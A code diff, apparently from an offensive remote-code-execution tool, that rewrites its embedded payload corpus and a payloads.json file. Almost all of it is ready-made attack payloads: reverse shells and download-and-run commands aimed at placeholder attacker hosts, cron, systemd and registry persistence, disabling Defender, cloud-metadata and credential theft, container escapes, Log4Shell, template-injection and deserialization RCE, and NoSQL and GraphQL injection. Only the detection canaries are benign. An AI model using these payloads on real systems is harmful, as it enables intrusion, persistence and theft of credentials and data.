+        "echo '*/5 * * * * /usr/bin/wget http://{attacker_domain}/payload.sh -O /tmp/payload.sh && sh /tmp/payload.sh' >> /etc/crontab",
+        "echo 'bash -i >& /dev/tcp/{attacker_ip}/443 0>&1' >> ~/.bashrc",
+        "mkdir -p ~/.config/systemd/user; echo -e '[Service]\nExecStart=/bin/bash -c \"bash -i >& /dev/tcp/{attacker_ip}/443 0>&1\"\n[Install]\nWantedBy=default.target' > ~/.config/systemd/user/update.service",
+        "echo '*/10 * * * * root /usr/bin/python3 -c \"import urllib.request; exec(urllib.request.urlopen(\\'http://{attacker_domain}/s.py\\').read())\"' >> /etc/cron.d/system"
+      ],
+      "windows": [
+        "reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v Updater /t REG_SZ /d C:\\\\Windows\\\\Temp\\\\backdoor.exe /f",
+        "schtasks /Create /SC ONLOGON /TN Updater /TR \\\"powershell.exe -ExecutionPolicy Bypass -File %TEMP%\\\\backdoor.ps1\\\" /F",
+        "powershell -Command \"New-ItemProperty -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run -Name Sync -Value 'powershell -nop -w hidden -c Invoke-WebRequest http://{attacker_domain}/sync.ps1 -OutFile $env:TEMP\\\\sync.ps1; & $env:TEMP\\\\sync.ps1'\"",
+        "powershell -Command \"Set-MpPreference -DisableRealtimeMonitoring $true\"",
+        "copy %SystemRoot%\\\\System32\\\\cmd.exe %APPDATA%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\update.exe"
+      ]
+    },
+    "cloud_metadata": {
+      "unix": [
+        "curl -H 'Metadata-Flavor: Google' http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token",
+        "curl http://169.254.169.254/latest/meta-data/iam/security-credentials/",
+        "wget -q -O- http://169.254.169.254/metadata/instance?api-version=2021-02-01 -H 'Metadata:true'",
+        "aws sts get-caller-identity",
+        "curl http://100.100.100.200/latest/meta-data/ram/security-credentials/"
+      ],
+      "windows": [
+        "powershell -Command \"Invoke-WebRequest -Headers @{'Metadata-Flavor'='Google'} -Uri http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token\"",
+        "powershell -Command \"Invoke-RestMethod -Headers @{Metadata='true'} -Uri http://169.254.169.254/metadata/instance?api-version=2021-02-01\"",
+        "powershell -Command \"Invoke-WebRequest -Uri http://169.254.169.254/latest/meta-data/iam/security-credentials/\"",
+        "powershell -Command \"Invoke-RestMethod -Uri http://100.100.100.200/latest/meta-data/ram/security-credentials/\""
+      ],
+      "docker": [
+        "curl --connect-timeout 1 http://169.254.169.254/latest/meta-data/",
+        "ip route",
+        "nsenter --target 1 --mount --uts --ipc --net --pid curl http://169.254.169.254/latest/meta-data/"
+      ],
+      "kubernetes": [
+        "kubectl get secrets -n kube-system aws-auth -o yaml",
+        "curl -k -H 'Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)' https://kubernetes.default.svc/api",
+        "kubectl get configmap -n kube-system cluster-info -o yaml"
+      ]
+    },
+    "database_enumeration": {
+      "unix": [
+        "mysql -e \"SHOW DATABASES;\"",
+        "psql -c \"SELECT table_schema,table_name FROM information_schema.tables LIMIT 10;\"",
+        "mongo --quiet --eval \"db.adminCommand({listDatabases:1})\"",
+        "sqlite3 /etc/passwd \"SELECT * FROM sqlite_master;\"",
+        "redis-cli INFO"
+      ],
+      "windows": [
+        "sqlcmd -Q \"SELECT name FROM sys.databases\"",
+        "powershell -Command \"Invoke-Sqlcmd -Query \"\"SELECT name FROM master..sysdatabases\"\"\"",
+        "wmic path win32_service get Name,PathName | findstr /i sql"
+      ],
+      "php": [
+        "$pdo = new PDO('mysql:host=127.0.0.1', 'root', ''); foreach($pdo->query('SHOW DATABASES') as $row){echo $row[0] . \"\\n\";}",
+        "echo mysqli_get_host_info(mysqli_connect('127.0.0.1', 'root', ''));",
+        "$db = new PDO('sqlite:/var/www/html/database.sqlite'); foreach($db->query('SELECT name FROM sqlite_master') as $row){echo $row['name'];}"
+      ],
+      "python": [
+        "import sqlite3; [print(row) for row in sqlite3.connect('app.db').execute(\"SELECT name FROM sqlite_master WHERE type='table'\")]",
+        "import pymongo; client = pymongo.MongoClient('mongodb://127.0.0.1:27017'); print(client.list_database_names())",
+        "import mysql.connector; conn = mysql.connector.connect(user='root',password='',host='127.0.0.1'); cursor = conn.cursor(); cursor.execute('SHOW DATABASES'); print(cursor.fetchall())"
+      ]
+    },
+    "lateral_movement": {
+      "unix": [
+        "ssh -oStrictHostKeyChecking=no user@{attacker_ip}",
+        "for host in $(cut -d' ' -f1 /etc/hosts); do ssh -oBatchMode=yes $host uptime; done",
+        "scp /etc/passwd {attacker_ip}:/tmp/passwd_copy",
+        "ansible all -i {attacker_ip}, -m shell -a 'whoami'",
+        "rsh {attacker_ip} whoami"
+      ],
+      "windows": [
+        "wmic /node:{attacker_ip} process call create 'cmd.exe /c whoami'",
+        "psexec \\\\{attacker_ip} cmd.exe /c whoami",
+        "winrs -r:{attacker_ip} cmd",
+        "powershell -Command \"Invoke-Command -ComputerName {attacker_ip} -ScriptBlock { whoami }\"",
+        "net use \\\\{attacker_ip}\\\\C$"
+      ]
+    },
+    "waf_bypass": {
+      "unix": [
+        "cat${IFS}/etc/passwd",
+        "cat$IFS/etc/passwd",
+        "cat${IFS%??}/etc/passwd",
+        "{cat,/etc/passwd}",
+        "cat</etc/passwd",
+        "who$@ami",
+        "uname${IFS}-a",
+        "i\\d"
+      ],
+      "windows": [
+        "who^ami",
+        "wh^o^ami",
+        "type%09C:\\Windows\\win.ini",
+        "cmd /c who^ami"
+      ]
+    },
+    "oob": {
+      "unix": [
+        "curl http://{oob}/",
+        "wget -qO- http://{oob}/",
+        "nslookup {oob}",
+        "ping -c 1 {oob}",
+        "dig {oob}",
+        "curl http://{oob}/$(whoami)",
+        "curl http://$(whoami).{oob}/"
+      ],
+      "windows": [
+        "nslookup {oob}",
+        "powershell -c \"Invoke-WebRequest -UseBasicParsing http://{oob}/\"",
+        "powershell -c \"Resolve-DnsName {oob}\"",
+        "certutil -urlcache -f http://{oob}/ %TEMP%\\x",
+        "cmd /c nslookup %USERNAME%.{oob}"
+      ],
+      "java": [
+        "${jndi:ldap://{oob}/a}",
+        "${jndi:dns://{oob}/a}",
+        "${jndi:rmi://{oob}/a}"
+      ]
+    },
+    "nosql_injection": {
+      "mongodb": {
+        "operator_injection": [
+          "{\"username\": {\"$ne\": null}, \"password\": {\"$ne\": null}}",
+          "{\"username\": {\"$gt\": \"\"}, \"password\": {\"$gt\": \"\"}}",
+          "{\"username\": \"admin\", \"password\": {\"$regex\": \"^.*\"}}",
+          "username[$ne]=admin&password[$ne]=x",
+          "{\"$or\": [{}, {\"x\": \"y\"}], \"username\": \"admin\"}"
+        ],
+        "where_js": [
+          "{\"$where\": \"return true\"}",
+          "{\"$where\": \"this.password == this.username\"}",
+          "{\"$where\": \"sleep(5000)\"}",
+          "admin' || '1'=='1",
+          "'; return true; var x='"
+        ],
+        "server_side_js": [
+          "{\"$expr\": {\"$function\": {\"body\": \"function(){return true}\", \"args\": [], \"lang\": \"js\"}}}",
+          "{\"$expr\": {\"$function\": {\"body\": \"function(){return sleep(5000)}\", \"args\": [], \"lang\": \"js\"}}}",
+          "{\"$accumulator\": {\"init\": \"function(){return sleep(5000)}\", \"accumulate\": \"function(){}\", \"accumulateArgs\": [], \"merge\": \"function(){}\", \"lang\": \"js\"}}"
+        ]
+      }
+    },
+    "graphql_injection": {
+      "graphql": {
+        "introspection": [
+          "{__schema{types{name}}}",
+          "{__schema{queryType{name} mutationType{name} types{name fields{name}}}}",
+          "{__type(name:\"User\"){name fields{name type{name kind}}}}",
+          "query{__typename}"
+        ],
+        "injection": [
+          "{ user(id: \"1; id\") { name } }",
+          "{ user(id: \"1' OR '1'='1-- \") { name } }",
+          "{ search(q: \"$(id)\") { id } }",
+          "{ file(path: \"../../../../etc/passwd\") { content } }",
+          "{ user(id: \"1${IFS}||${IFS}id\") { name } }"
+        ],
+        "batching": [
+          "{ a: user(id:\"1\"){name} b: user(id:\"2\"){name} c: user(id:\"3\"){name} }",
+          "query { a { b { c { d { e } } } } }"
+        ]
+      }
     }
+  },
+  "detection_payloads": {
+    "unix": [
+      "echo DETECTION_{canary}",
+      "sleep 5",
+      "printf 'canary:%s' $(hostname)",
+      "command -v whoami && echo HEALTH_{canary}",
+      "printf 'det:%s' $(id -u)",
+      "curl http://{oob}/",
+      "nslookup {oob}"
+    ],
+    "windows": [
+      "echo DETECTION_{canary}",
+      "timeout /T 5",
+      "powershell -Command \"Start-Sleep -Seconds 3; Write-Output 'DETECTION_{canary}'\"",
+      "for /f \"tokens=2 delims==\" %i in (\"%TIME%\") do @echo DETECTION_{canary}:%i",
+      "powershell -Command \"[Console]::WriteLine('det-{canary}')\"",
+      "nslookup {oob}"
+    ],
+    "php": [
+      "echo 'DETECTION_{canary}';",
+      "error_log('DETECTION_{canary}');",
+      "var_dump('DETECTION_{canary}');"
+    ],
+    "python": [
+      "print('DETECTION_{canary}')",
+      "import time; time.sleep(2)",
+      "import os; print(f'detect:{canary}:{os.getpid()}')",
+      "__import__('time').sleep(1)"
+    ],
+    "nodejs": [
+      "console.log('DETECTION_{canary}')",
+      "setTimeout(()=>console.log('timer {canary}'), 1000)",
+      "process.stdout.write('detect-{canary}')",
+      "setImmediate(()=>console.log('det:{canary}'))"
+    ],
+    "java": [
+      "System.out.println(\"DETECTION_{canary}\");",
+      "Thread.sleep(2000);",
+      "System.err.println(\"DETECTION_{canary}\");",
+      "System.out.printf(\"det:%s\\n\", \"{canary}\");"
+    ],
+    "dotnet": [
+      "Console.WriteLine(\"DETECTION_{canary}\");",
+      "System.Threading.Thread.Sleep(2000);",
+      "Console.Error.WriteLine(\"det-{canary}\");"
+    ],
+    "docker": [
+      "echo 'detector:{canary}'",
+      "sleep 2",
+      "cat /proc/1/cgroup | head -n 5"
+    ],
+    "kubernetes": [
+      "kubectl get pods --namespace default",
+      "echo 'kube-detect-{canary}'",
+      "kubectl cluster-info"
+    ],
+    "ruby": [
+      "puts 'DETECTION_{canary}'",
+      "sleep 1"
+    ],
+    "perl": [
+      "print \"DETECTION_{canary}\\n\";",
+      "select(undef, undef, undef, 1);"
+    ],
+    "go": [
+      "fmt.Println(\"DETECTION_{canary}\")",
+      "time.Sleep(1 * time.Second)"
+    ],
+    "sql": [
+      "SELECT 'DETECTION_{canary}';",
+      "SELECT pg_sleep(1);"
+    ],
+    "powershell": [
+      "Write-Output \"DETECTION_{canary}\"",
+      "Start-Sleep -Milliseconds 500"
+    ]
+  },
+  "eval_carriers": {
+    "freemarker": {
+      "engines": [
+        "freemarker"
+      ],
+      "template": "${(__EXPR__)?c}",
+      "notes": "Freemarker renders a bare ${a*b} with the locale's grouping separators (2,070,761,401), so the raw product RCEKit searches for is absent and a genuinely evaluating target reads as negative. ?c is the computer number format and yields the bare digits.",
+      "verified": "freemarker 2.3.32: ${a*b} -> '2,070,761,401' (product NOT found); ${(a*b)?c} -> '2070761401' (found)"
+    },
+    "velocity": {
+      "engines": [
+        "velocity"
+      ],
+      "template": "#set($rk=__EXPR__)$rk",
+      "notes": "In Velocity ${a*b} is a reference, not an expression, so it is not evaluated at all and passes through literally. Arithmetic needs a #set directive.",
+      "verified": "velocity-engine-core 2.3: ${a*b} -> literal '${a*b}'; #set($x=a*b)$x -> '2070761401'"
+    },
+    "thymeleaf": {
+      "engines": [
+        "thymeleaf"
+      ],
+      "template": "[[${__EXPR__}]]",
+      "notes": "Thymeleaf only evaluates an expression inside its inlining brackets; a bare ${a*b} in template text is emitted verbatim.",
+      "verified": "thymeleaf 3.1.2: ${a*b} -> literal '${a*b}'; [[${a*b}]] -> '2070761401'. The __${...}__ preprocessing form was also tried and did NOT evaluate standalone, so it is deliberately not shipped."
+    }
+  }
 }
 """
 # --- END EMBEDDED PAYLOAD CORPUS ---

--- a/templates/payloads.json
+++ b/templates/payloads.json
@@ -1,617 +1,669 @@
 {
-    "payload_categories": {
-        "basic_enum": {
-            "unix": [
-                "id",
-                "whoami",
-                "uname -a",
-                "pwd",
-                "ls -la",
-                "ps aux",
-                "uptime",
-                "cat /etc/os-release",
-                "env",
-                "last -n 5",
-                "lsb_release -a 2>/dev/null"
-            ],
-            "windows": [
-                "whoami",
-                "ver",
-                "dir",
-                "tasklist",
-                "ipconfig",
-                "systeminfo",
-                "wmic os get Caption,CSDVersion,OSArchitecture,Version",
-                "set",
-                "query user",
-                "whoami /groups"
-            ]
-        },
-        "file_operations": {
-            "unix": [
-                "cat /etc/passwd",
-                "cat /etc/shadow",
-                "head -n 10 /etc/passwd",
-                "tail -f /var/log/syslog",
-                "find / -name '*.conf' -type f 2>/dev/null",
-                "ls -la /root 2>/dev/null",
-                "find /home -maxdepth 2 -type f -name '.ssh' 2>/dev/null",
-                "find / -perm -4000 -type f 2>/dev/null",
-                "getfacl -R /home 2>/dev/null",
-                "tar -cf /tmp/etc_backup.tar /etc 2>/dev/null"
-            ],
-            "windows": [
-                "type C:\\Windows\\System32\\drivers\\etc\\hosts",
-                "dir C:\\Windows\\System32\\drivers\\etc",
-                "dir C:\\Users",
-                "dir C:\\\\ProgramData",
-                "type C:\\\\Windows\\\\System32\\\\config\\\\SAM 2>nul",
-                "dir %USERPROFILE%\\\\Documents",
-                "type %USERPROFILE%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data 2>nul"
-            ]
-        },
-        "network_operations": {
-            "unix": [
-                "ifconfig",
-                "netstat -tulpn",
-                "arp -a",
-                "ping -c 4 127.0.0.1",
-                "ip addr",
-                "ss -tunlp",
-                "route -n",
-                "dig +short myip.opendns.com @resolver1.opendns.com"
-            ],
-            "windows": [
-                "ipconfig /all",
-                "netstat -ano",
-                "arp -a",
-                "ping -n 4 127.0.0.1",
-                "Get-NetIPConfiguration",
-                "route print",
-                "powershell -Command \"Resolve-DnsName {attacker_domain}\"",
-                "powershell -Command \"(Invoke-WebRequest -UseBasicParsing https://ifconfig.me).Content\""
-            ]
-        },
-        "code_execution": {
-            "nodejs": {
-                "child_process_exec": [
-                    "require('child_process').exec('whoami')",
-                    "require('child_process').exec('cat /etc/passwd | nc {attacker_ip} 443')",
-                    "require('child_process').exec('bash -c \"bash -i >& /dev/tcp/{attacker_ip}/443 0>&1\"')",
-                    "require('child_process').spawnSync('whoami').stdout.toString()",
-                    "process.mainModule.require('child_process').exec('id')"
-                ],
-                "pug_ssti": [
-                    "= 7 * 7",
-                    "= require('child_process').exec('whoami')",
-                    "= global.process.mainModule.require('child_process').exec('id')"
-                ],
-                "ejs_ssti": [
-                    "<%= 7 * 7 %>",
-                    "<%= require('child_process').exec('whoami') %>",
-                    "<%- global.process.mainModule.require('child_process').exec('id') %>"
-                ],
-                "handlebars_ssti": [
-                    "{{7 * 7}}",
-                    "{{ {math} }}",
-                    "{{lookup (lookup (lookup (lookup __proto__ 'constructor') 'constructor') 'call') 'whoami'}}",
-                    "{{#with (lookup (lookup this '__proto__') 'constructor')}}{{#with (lookup this 'constructor')}}{{call this 'cat /etc/passwd'}}{{/with}}{{/with}}"
-                ],
-                "vm_eval": [
-                    "(new (require('vm').Script)(`require('child_process').exec('whoami')`)).runInThisContext()",
-                    "vm.runInNewContext(`require('child_process').exec('curl http://{attacker_domain}/x.sh | sh')`, {}, { timeout: 1000 })",
-                    "require('vm').runInNewContext(`process.mainModule.require('child_process').exec('id')`)"
-                ],
-                "deserialization": [
-                    "const serialize = require('node-serialize'); const payload = \"{\\\"rce\\\": \\\"_$$ND_FUNC$$_function(){require('child_process').exec('id');}()\\\"}\"; serialize.unserialize(payload);",
-                    "const payload = \"{\\\"rce\\\":\\\"_$$ND_FUNC$$_function(){process.mainModule.require('child_process').exec('id');}()\\\"}\"; require('node-serialize').unserialize(payload);"
-                ],
-                "expression_template": [
-                    "{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}",
-                    "={{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}",
-                    "{{ (function(){ return this.constructor.constructor('return process')().mainModule.require('child_process').execSync('cat /etc/passwd').toString() })() }}",
-                    "={{ $jmespath ? '' : (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}"
-                ]
-            },
-            "python": {
-                "os_system": [
-                    "os.system('whoami')",
-                    "os.system('cat /etc/passwd')",
-                    "os.system('bash -i >& /dev/tcp/{attacker_ip}/443 0>&1')",
-                    "__import__('os').system('id')",
-                    "os.popen('hostname').read()"
-                ],
-                "subprocess": [
-                    "subprocess.call(['whoami'], shell=True)",
-                    "subprocess.Popen('cat /etc/passwd', shell=True).communicate()",
-                    "subprocess.check_output('uname -a', shell=True)"
-                ],
-                "jinja2_ssti": [
-                    "{{7*7}}",
-                    "{{ {math} }}",
-                    "{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}",
-                    "{{''.__class__.__mro__[1].__subclasses__()[396]('cat /etc/passwd',shell=True,stdout=-1).communicate()[0].strip()}}",
-                    "{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}",
-                    "{{cycler.__init__.__globals__['os'].popen('whoami').read()}}",
-                    "{{''.__class__.__mro__[2].__subclasses__()[40]('/bin/sh',shell=True,stdout=-1).communicate()}}"
-                ],
-                "exec_ast": [
-                    "@exec(\"raise Exception(__import__('subprocess').check_output(['id']))\")\ndef _(): pass",
-                    "@exec(\"raise Exception(open('/etc/passwd').read())\")\ndef _(): pass",
-                    "def _(a=exec(\"raise Exception(__import__('subprocess').check_output(['id']))\")): pass",
-                    "def _(a=exec(\"raise Exception(open('/etc/passwd').read())\")): pass",
-                    "def _(a=__import__('os').system('id')): pass"
-                ]
-            },
-            "postgres": {
-                "psql_meta_command": [
-                    "SELECT 1;\n\\! id\n",
-                    "SELECT 1;\n\\! cat /etc/passwd\n",
-                    {"payload": "SELECT 1;\r\\! id\r", "notes": ["CR (\\r) separates the meta-command so a newline-based validator (e.g. pgAdmin CVE-2025-13780) does not detect the \\! line"]},
-                    {"payload": "SELECT 1;\r\\! cat /etc/passwd\r", "notes": ["CR (\\r) meta-command bypass; psql still executes \\! after splitting on CR"]},
-                    {"payload": "SELECT 1;\r\\! bash -c 'id > /tmp/rcekit_{canary}'\r", "expected_channel": "response", "notes": ["blind sink: confirm out-of-band or via the written marker rather than the HTTP response"]},
-                    {"payload": "SELECT 1;\r\\! curl -s {callback}\r", "notes": ["blind async sink: {callback} is filled by the chain runner with the OOB listener URL; confirmation is the received callback, not the HTTP response"]},
-                    {"payload": "SELECT 1;\r\\! python3 -c 'import urllib.request;urllib.request.urlopen(\"{callback}\")'\r", "notes": ["blind async sink, curl-free OOB callback via python3; confirmed by the received callback"]}
-                ]
-            },
-            "php": {
-                "exec_system": [
-                    "system('whoami')",
-                    "exec('whoami')",
-                    "shell_exec('whoami')",
-                    "passthru('whoami')",
-                    "eval('system(\"whoami\")')",
-                    "preg_replace('/.*/e','system(\"whoami\")','')",
-                    "$output = shell_exec('whoami'); echo $output;",
-                    "system($_GET['cmd']);",
-                    "shell_exec('curl http://{attacker_domain}/payload.sh | sh');"
-                ],
-                "eval": [
-                    "assert(\"system('whoami')\");",
-                    "@create_function(\"\", \"system('ls');\");",
-                    "eval(base64_decode('c3lzdGVtKCd3aG9hbWknKTs='));"
-                ],
-                "deserialize": [
-                    "$payload = file_get_contents('php://input'); $object = unserialize($payload);",
-                    "$obj = unserialize($_POST['payload']); var_dump($obj);"
-                ]
-            },
-            "java": {
-                "runtime_exec": [
-                    "Runtime.getRuntime().exec(\"whoami\")",
-                    "new ProcessBuilder(\"whoami\").start()",
-                    "Runtime.getRuntime().exec(\"cat /etc/passwd\")",
-                    "Process process = new ProcessBuilder().command(\"bash\",\"-c\",\"id\").start();",
-                    "Runtime.getRuntime().exec(new String[]{\"bash\",\"-c\",\"cat /etc/passwd\"});"
-                ],
-                "freemarker_ssti": [
-                    "${7*7}",
-                    "${'freemarker.template.utility.Execute'?new()('id')}",
-                    "<#assign ex = 'freemarker.template.utility.Execute'?new()>${ ex('id')}",
-                    "${'freemarker.template.utility.Execute'?new()('cat /etc/passwd')}"
-                ],
-                "velocity_ssti": [
-                    "#set($x='') $x",
-                    "#set($rt=$x.class.forName('java.lang.Runtime')) #set($chr=$x.class.forName('java.lang.Character')) #set($str=$x.class.forName('java.lang.String')) #set($ex=$rt.getRuntime().exec('id')) $d=$ex.getInputStream() $d=$chr.toChars($d.readBytes($d.available())) $out=$str.valueOf($d) $out",
-                    "#set($process=$x.class.forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')) $process"
-                ],
-                "thymeleaf_ssti": [
-                    "[[${7*7}]]",
-                    "[[${T(java.lang.Runtime).getRuntime().exec('id')}]]",
-                    "[[${T(java.lang.Runtime).getRuntime().exec('cat /etc/passwd')}]]"
-                ],
-                "deserialization": [
-                    "new ObjectInputStream(new ByteArrayInputStream(payload)).readObject(); // ysoserial gadget",
-                    "new ObjectInputStream(new FileInputStream(\"payload.bin\")).readObject();"
-                ],
-                "expression": [
-                    "javax.script.ScriptEngineManager m = new javax.script.ScriptEngineManager(); m.getEngineByName(\"JavaScript\").eval(\"java.lang.Runtime.getRuntime().exec('id')\");",
-                    "new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(\"java.lang.Runtime.getRuntime().exec('cat /etc/passwd')\");"
-                ],
-                "spel": [
-                    "T(java.lang.Runtime).getRuntime().exec(\"id\")",
-                    "new java.lang.ProcessBuilder(new String[]{\"bash\",\"-c\",\"id\"}).start()",
-                    "T(java.lang.Runtime).getRuntime().exec(new String[]{\"bash\",\"-c\",\"cat /etc/passwd\"})"
-                ],
-                "ognl": [
-                    "(#rt=@java.lang.Runtime@getRuntime()).exec(\"id\")",
-                    "%{(#rt=@java.lang.Runtime@getRuntime()).(#rt.exec(\"id\"))}",
-                    "(#cmd=\"id\").(#p=new java.lang.ProcessBuilder(#cmd)).(#p.start())"
-                ],
-                "groovy": [
-                    "\"id\".execute()",
-                    "[\"bash\",\"-c\",\"id\"].execute()",
-                    "Runtime.getRuntime().exec(\"id\")",
-                    "this.class.classLoader.parseClass(\"Runtime.getRuntime().exec('id')\").newInstance()"
-                ]
-            },
-            "dotnet": {
-                "process_start": [
-                    "Process.Start(\"whoami.exe\")",
-                    "Process.Start(\"cmd.exe\", \"/c whoami\")",
-                    "new Process { StartInfo = new ProcessStartInfo { FileName = \"cmd.exe\", Arguments = \"/c whoami\" } }.Start()",
-                    "Process.Start(new ProcessStartInfo(\"cmd.exe\"){Arguments=\"/c whoami\",UseShellExecute=false,RedirectStandardOutput=true});",
-                    "System.Diagnostics.Process.Start(\"powershell.exe\",\"-Command \\\"Get-Process\\\"\");"
-                ],
-                "deserialize": [
-                    "new BinaryFormatter().Deserialize(new MemoryStream(payload)); // Gadget execution",
-                    "new NetDataContractSerializer().Deserialize(new MemoryStream(payload));"
-                ]
-            },
-            "ruby": {
-                "kernel_system": [
-                    "system('whoami')",
-                    "`whoami`",
-                    "Kernel.system('whoami')",
-                    "Kernel.exec('whoami')",
-                    "IO.popen('id'){|io| io.read }",
-                    "%x(id)"
-                ],
-                "erb_ssti": [
-                    "<%= 7 * 7 %>",
-                    "<%= `whoami` %>",
-                    "<%= File.open('/etc/passwd').read %>",
-                    "<%= IO.popen('id'){|io| io.read } %>"
-                ]
-            },
-            "perl": {
-                "system_backticks": [
-                    "system('whoami')",
-                    "`whoami`",
-                    "exec('whoami')",
-                    "print `id`;",
-                    "open(my $fh, '-|', 'id'); while(<$fh>){print;}"
-                ]
-            },
-            "go": {
-                "os_exec": [
-                    "exec.Command(\"whoami\").Output()",
-                    "exec.Command(\"bash\", \"-c\", \"whoami\").Output()",
-                    "exec.Command(\"cat\", \"/etc/passwd\").Output()",
-                    "cmd := exec.Command(\"sh\",\"-c\",\"id\"); out, _ := cmd.CombinedOutput(); string(out)",
-                    "exec.Command(\"powershell\",\"-Command\",\"whoami\").Output()"
-                ]
-            }
-        },
-        "download_execute": {
-            "unix": [
-                "curl http://{attacker_domain}/shell.sh | sh",
-                "wget http://{attacker_domain}/shell.sh -O /tmp/shell.sh && chmod +x /tmp/shell.sh && /tmp/shell.sh",
-                "python3 -c \"import urllib.request; exec(urllib.request.urlopen('http://{attacker_domain}/shell.py').read())\"",
-                "perl -e 'use LWP::Simple; getstore(\"http://{attacker_domain}/shell\", \"/tmp/shell\"); system(\"/tmp/shell\");'",
-                "php -r \"$c=file_get_contents('http://{attacker_domain}/payload.php'); eval($c);\""
-            ],
-            "windows": [
-                "powershell -c \"IEX(New-Object Net.WebClient).DownloadString('http://{attacker_domain}/shell.ps1')\"",
-                "certutil -urlcache -f http://{attacker_domain}/shell.exe shell.exe && shell.exe",
-                "bitsadmin /transfer job /download /priority high http://{attacker_domain}/shell.exe shell.exe && shell.exe",
-                "powershell -c \"Invoke-WebRequest -Uri 'http://{attacker_domain}/shell.ps1' -OutFile $env:TEMP\\shell.ps1; . $env:TEMP\\shell.ps1\""
-            ]
-        },
-        "reverse_shells": {
-            "unix": [
-                "bash -i >& /dev/tcp/{attacker_ip}/443 0>&1",
-                "nc -e /bin/sh {attacker_ip} 443",
-                "python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"{attacker_ip}\",443)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call([\"/bin/sh\",\"-i\"])'",
-                "perl -e 'use Socket;$i=\"{attacker_ip}\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'",
-                "php -r '$sock=fsockopen(\"{attacker_ip}\",443);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
-            ],
-            "windows": [
-                "powershell -c \"$client = New-Object System.Net.Sockets.TCPClient('{attacker_ip}',443); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()\"",
-                "powershell -nop -w hidden -c \"$client = New-Object System.Net.Sockets.TCPClient('{attacker_ip}',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();\"",
-                "cmd.exe /c powershell -Command \"$sm=(New-Object Net.Sockets.TCPClient('{attacker_ip}',443)).GetStream();$sw=New-Object IO.StreamWriter($sm);$sr=New-Object IO.StreamReader($sm);while(($cmd=$sr.ReadLine()) -ne $null){$send=(iex $cmd 2>&1 | Out-String);$sw.WriteLine($send);$sw.Flush()}\""
-            ]
-        },
-        "container_escape": {
-            "docker": [
-                "cat /proc/1/environ",
-                "nsenter --target 1 --mount --uts --ipc --net --pid /bin/sh",
-                "cp /bin/sh /host/tmp/sh && chmod +s /host/tmp/sh",
-                "mount | grep overlay",
-                "docker run -v /:/host alpine chroot /host /bin/sh"
-            ],
-            "kubernetes": [
-                "kubectl get pods --namespace kube-system",
-                "kubectl run rce --image=alpine --restart=Never --command -- sh -c 'nc {attacker_ip} 443 -e /bin/sh'",
-                "kubectl exec -n kube-system kube-apiserver-0 -- cat /etc/kubernetes/admin.conf",
-                "kubectl auth can-i --list",
-                "kubectl get secrets -A"
-            ]
-        },
-        "credential_access": {
-            "unix": [
-                "grep -Ri 'password' /etc 2>/dev/null",
-                "ls -la ~/.ssh",
-                "cat ~/.ssh/id_rsa 2>/dev/null",
-                "find / -name 'id_rsa' -o -name '*.kdbx' 2>/dev/null",
-                "awk -F: '{ if ($2 != \"*\" && $2 != \"!\") print $1 }' /etc/shadow 2>/dev/null"
-            ],
-            "windows": [
-                "cmdkey /list",
-                "dir C:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Credentials",
-                "reg query HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon",
-                "findstr /si password *.txt *.config *.ini",
-                "type %USERPROFILE%\\\\AppData\\\\Local\\\\Microsoft\\\\Credentials\\\\* 2>nul"
-            ],
-            "php": [
-                "$config = include 'config.php'; var_dump($config);",
-                "echo file_get_contents(__DIR__ . '/.env');",
-                "echo file_get_contents('/var/www/html/config/database.php');"
-            ],
-            "python": [
-                "import os; print(os.environ.get('AWS_SECRET_ACCESS_KEY'))",
-                "from pathlib import Path; print(Path.home().joinpath('.aws','credentials').read_text())",
-                "import keyring; print(keyring.get_keyring())"
-            ]
-        },
-        "privilege_escalation": {
-            "unix": [
-                "sudo -l",
-                "cat /etc/sudoers",
-                "find / -perm -4000 -type f 2>/dev/null",
-                "getcap -r / 2>/dev/null",
-                "grep -R 'NOPASSWD' /etc/sudoers /etc/sudoers.d 2>/dev/null"
-            ],
-            "windows": [
-                "whoami /priv",
-                "whoami /groups",
-                "icacls C:\\\\Windows\\\\System32\\\\cmd.exe",
